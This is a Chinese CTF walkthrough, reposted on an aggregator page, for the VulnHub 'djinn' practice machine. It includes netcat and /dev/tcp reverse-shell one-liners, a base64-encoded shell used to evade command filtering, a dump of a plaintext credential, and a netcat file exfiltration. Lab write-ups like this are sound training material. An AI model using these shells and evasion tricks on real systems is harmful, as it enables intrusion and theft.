djinn靶机 - 走看看

zoukankan html css js c++ java

djinn靶机

仅供个人娱乐

靶机信息

https://download.vulnhub.com/djinn/djinn.ova

一、主机探测

二、漏洞的查找和利用

21端口ftp 匿名登录

7331端口

命令执行反弹窗口

nc -e /bin/bash 192.168.174.129 4444

尝试绕过

bash -i >& /dev/tcp/192.168.174.129/4444 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzNi4xMjkvNDQ0NCAwPiYx

使用base64绕过然后再解出来传给bash

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzNi4xMjkvNDQ0NCAwPiYx | base64 -d | bash

python -c "import pty;pty.spawn('/bin/bash')"

读取/etc/passwd发现有两个用户sam和nitish

查看creds.txt

nitish p4ssw0rdStr3r0n9

sudo -u sam genie -cmd 123

查找可写文件

find / -writable -type f 2>/dev/null

信息收集

将文件下载到kali

靶机运行：python3 -m http.server 6666

kali运行：wget http://192.168.236.128/.pyc

失败

靶机运行： cat /home/sam/.pyc | nc 192.168.236.129 7777

kali运行：nc -nlvp 7777 >exp.pyc

反编译

查看全文

相关阅读:
解决：ImportError: cannot import name 'login' from 'django.contrib.auth.views'
报错：No module named 'django.contrib.staticfiles.templatetags'
模块django.forms.forms的用法
 cannot import name 'python_2_unicode_compatible'
解决ImproperlyConfigured: Error loading MySQLdb module: No module named 'MySQLdb'问题
 Django自学之 django基本命令，Django常用命令
 django使用cmd的基本命令-启动、新建
 解决 The repository located at pypi.doubanio.com is not a trusted or secure host and is being ignored.的问题
 解决ImportError: cannot import name 'six' from 'django.utils'
设计模式--开篇

原文地址：https://www.cnblogs.com/bingtang123/p/13298820.html

Copyright © 2011-2022 走看看